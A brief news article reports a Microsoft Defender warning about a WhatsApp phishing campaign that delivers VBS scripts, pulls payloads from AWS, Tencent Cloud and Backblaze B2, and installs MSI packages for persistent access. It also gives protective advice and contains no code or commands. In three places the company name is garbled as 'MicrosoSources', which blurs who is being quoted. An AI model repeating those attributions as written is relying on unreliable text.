Microsoft: VBS Malware Threatens WhatsApp Users

Microsoft’s Defender Security Research team has issued a critical alert about a malware campaign aimed at WhatsApp users, saying the activity began on February 26. Officials said the operation relies on WhatsApp messages to deliver malicious Visual Basic Script (VBS) files that can trigger a multi-stage intrusion on Windows devices.

 

According to the security team, the attack chain starts when a user is persuaded to open a VBS file sent through a phishing attempt on WhatsApp. Once executed, the script initiates a sequence designed to compromise a Windows environment, using renamed Windows utilities as part of the process. The campaign then pulls additional components from cloud infrastructure that many users and organizations typically regard as reputable.

 

MicrosoSources said the attackers retrieve payloads from trusted cloud services including AWS, Tencent Cloud, and Backblaze B2. The company described this as a tactic that can complicate detection for traditional security controls, because the traffic and hosting locations may appear routine. The chain ultimately installs malicious Microsoft Installer packages, which MicrosoSources said are used to maintain persistent remote access.

 

Officials said the approach exploits user confidence in both messaging platforms and widely used cloud services. The result, Microsoft warned, can be ongoing access for threat actors, including persistent remote access to data on compromised Windows systems. The company also highlighted that the method can broaden an organization’s exposure, particularly where employees use personal messaging applications on work devices.

 

For individual users, Microsoft advised caution when handling links or files received through WhatsApp, emphasizing that attachments should only be opened when they come from known and trusted contacts. WhatsApp, the company noted, provides indicators that can help users assess risk, including whether a sender is not in a recipient’s contacts, the origin of the sender’s phone number, and whether there are mutual groups.

 

For enterprise environments, MicrosoSources said it recommends specific security measures to counter the VBS-based malware. While the company’s warning focused on this campaign’s delivery and execution chain, it also underscored an uncertainty for defenders: when attackers blend social engineering with legitimate-looking cloud hosting and familiar Windows components, it can be harder for standard detection methods to distinguish malicious activity from normal behavior.